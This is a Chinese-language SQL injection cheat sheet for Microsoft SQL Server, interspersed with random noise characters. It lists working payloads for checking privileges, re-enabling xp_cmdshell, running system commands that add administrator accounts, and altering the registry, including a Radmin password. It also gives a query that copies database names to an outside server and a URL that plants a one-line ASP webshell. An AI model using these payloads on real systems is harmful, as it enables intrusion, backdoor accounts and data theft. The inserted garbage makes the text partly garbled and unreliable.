阿Ｄ常用的一些注入命令

admin

阿Ｄ常用的一些注入命令
//看看是什么权限的
and 1=(Select IS_MEMBER('db_owner'))
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--
- c! _- `9 r# ^  H
4 B! n  P2 v6 ?. k, i' b7 u//检测是否有读取某数据库的权限
" e8 p  G/ M; D- E: H0 D4 {and 1= (Select HAS_DBACCESS('master'))
) @6 n# _9 ~' a' I1 J7 \( W3 k8 Y* JAnd char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --
7 h, o% L/ P5 }: K3 f( {

* |2 V! h8 w+ n$ z$ v数字类型
& \- b* E0 e" p  C2 K3 qand char(124)%2Buser%2Bchar(124)=0

' H7 r1 ~5 M$ |+ h' A& O字符类型
9 V) s5 a9 Q2 s( i( p" N  N' and char(124)%2Buser%2Bchar(124)=0 and ''='
4 {, W" K8 j+ x
$ |& o! E& o, `$ {+ l3 L% O搜索类型
' and char(124)%2Buser%2Bchar(124)=0 and '%'='
, a. r- v0 g8 }4 [4 j
! r3 ]+ E5 g0 D爆用户名
  `; a+ X' P! A! B9 Qand user>0
* T) ]6 q, c$ V, |, n) w: [+ u% o5 M' t! G' and user>0 and ''='
: C% d: b4 w0 f7 P1 q
/ i/ i$ R7 H- I2 c3 [* X3 `. X$ n: X检测是否为SA权限
and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
1 I1 D# g$ S5 n* \And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --
7 O; I. Y, Z% Q( ~  c) ]
检测是不是MSSQL数据库
7 N4 p* Q' g, P) B* k8 O: `/ mand exists (select * from sysobjects);--

2 S- b: ?+ y* c检测是否支持多行
;declare @d int;--
# Q5 l9 w& }( P( P7 A
恢复 xp_cmdshell
9 Y' I7 f1 M* I;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--
* Z* [* L1 q1 o1 i2 h' [" V
1 P& q" G( _- @# g) N
select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')
9 b0 d& c# i$ J: c& m
3 Y, c  ~" g# D+ ^# {//-----------------------
//      执行命令
//-----------------------
首先开启沙盘模式：
5 k/ J. C/ U+ Qexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
* T9 G' x2 Y8 r
然后利用jet.oledb执行系统命令
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
7 U; P7 b7 H0 E; ~, p
执行命令
) E5 U6 i; Z$ H;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--
. @9 G2 V0 O6 B: g
+ \1 @' ]/ L2 w8 AEXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'

  O% ]5 I0 H, z6 s; g* z' j" O% Y* n判断xp_cmdshell扩展存储过程是否存在：
6 E' T  A" Q/ c9 M$ E. `http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')
8 V# h1 g5 _( ]& N1 d! f
写注册表
; H! ^; L7 m& _9 r2 x: J: W* Qexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
* ^2 R0 S" p5 g+ ^
, R7 b  ~, Y& Q6 I- ]- DREG_SZ

读注册表
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'

6 v* B7 B/ A" Q# y% d- \读取目录内容
& U% a1 |+ ]+ b" W% |exec master..xp_dirtree 'c:\winnt\system32\',1,1
' Q) H  B( }' \5 i/ }6 E6 C

  A  @1 T' _. L# T+ j5 A6 A数据库备份
backup database pubs to disk = 'c:\123.bak'
' a; Z# k2 d8 o6 e9 ]
//爆出长度
And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--
5 s5 ?9 m8 x0 z2 @8 b
3 L% W! S+ D4 J2 ^% _. `8 I3 Q0 O% w/ R
" }3 @; L5 U. D
8 Y) z2 \, [4 W9 y. `5 @9 Q更改sa口令方法：用sql综合利用工具连接后，执行命令：
$ i) l) n$ s( g0 z5 n/ Q0 n) {% Aexec sp_password NULL,'新密码','sa'
8 j' r$ X9 t& g& m9 A
添加和删除一个SA权限的用户test：
! q6 [& U  T; qexec master.dbo.sp_addlogin test,ptlove
5 v4 K, F; z& ~8 fexec master.dbo.sp_addsrvrolemember test,sysadmin
9 o, ?9 f* \+ q, [! e
删除扩展存储过过程xp_cmdshell的语句:
exec sp_dropextendedproc 'xp_cmdshell'
. {+ z: q- \2 j
添加扩展存储过过程
EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
/ R- z% z5 X% }# j/ C# cGRANT exec On xp_proxiedadata TO public


停掉或激活某个服务。
: S" x, `* s; T5 W3 O
exec master..xp_servicecontrol 'stop','schedule'
5 u: \6 K) p1 Mexec master..xp_servicecontrol 'start','schedule'

dbo.xp_subdirs
) |2 }9 m$ _  i& }) v
3 S  V: L: Q$ X  F% S0 `2 y4 I4 q, _只列某个目录下的子目录。
xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'

dbo.xp_makecab

将目标多个档案压缩到某个目标档案之内。
: M2 m/ d4 \( `# y+ n所有要压缩的档案都可以接在参数列的最后方，以逗号隔开。

dbo.xp_makecab
'c:\test.cab','mszip',1,
'C:\Inetpub\wwwroot\SQLInject\login.asp',
7 P# F+ }( a8 J'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'

xp_terminate_process
- a5 e% c& J$ J# o8 S
停掉某个执行中的程序，但赋予的参数是 Process ID。
4 c# j" H9 r2 R6 \6 C# O利用”工作管理员”，透过选单「检视」-「选择字段」勾选 pid，就可以看到每个执行程序的 Process ID
* O  L+ I; x4 U9 N/ G/ t0 }! t7 C* \
+ K+ ?* q& [! Z7 A0 C! [xp_terminate_process 2484

xp_unpackcab

' S0 c) @0 b4 g+ _( a( Q$ K解开压缩档。

xp_unpackcab 'c:\test.cab','c:\temp',1
3 y/ r" l  A# B
' x( _; T( y- U1 c# d) c
+ ]! e2 @; _0 x0 Y某机，安装了radmin，密码被修改了，regedit.exe不知道被删除了还是被改名了，net.exe不存在，没有办法使用regedit /e 导入注册文件，但是mssql是sa权限，使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234

' H/ A+ z/ N3 k3 icreate database lcx;
' Z. D) b" T! d* U& ICreate TABLE ku(name nvarchar(256) null);
Create TABLE biao(id int NULL,name nvarchar(256) null);
4 F1 l* v9 x0 C- g3 F/ u  s
//得到数据库名
$ O2 e4 W7 F- U% q. T% Dinsert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases
1 j7 P  m2 Z- v5 {5 M" [2 v# O4 w

//在Master中创建表，看看权限怎样
Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--
9 O! N; H& ]8 b
9 @5 S5 d2 Y9 \& F用 sp_makewebtask直接在web目录里写入一句话马：
3 H5 R. W! r2 z& h* W' O% G) M- Ghttp://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--
5 Y& Y: k1 W! z+ ]# i
//更新表内容
Update films SET kind = 'Dramatic' Where id = 123

//删除内容
delete from table_name where Stockid = 3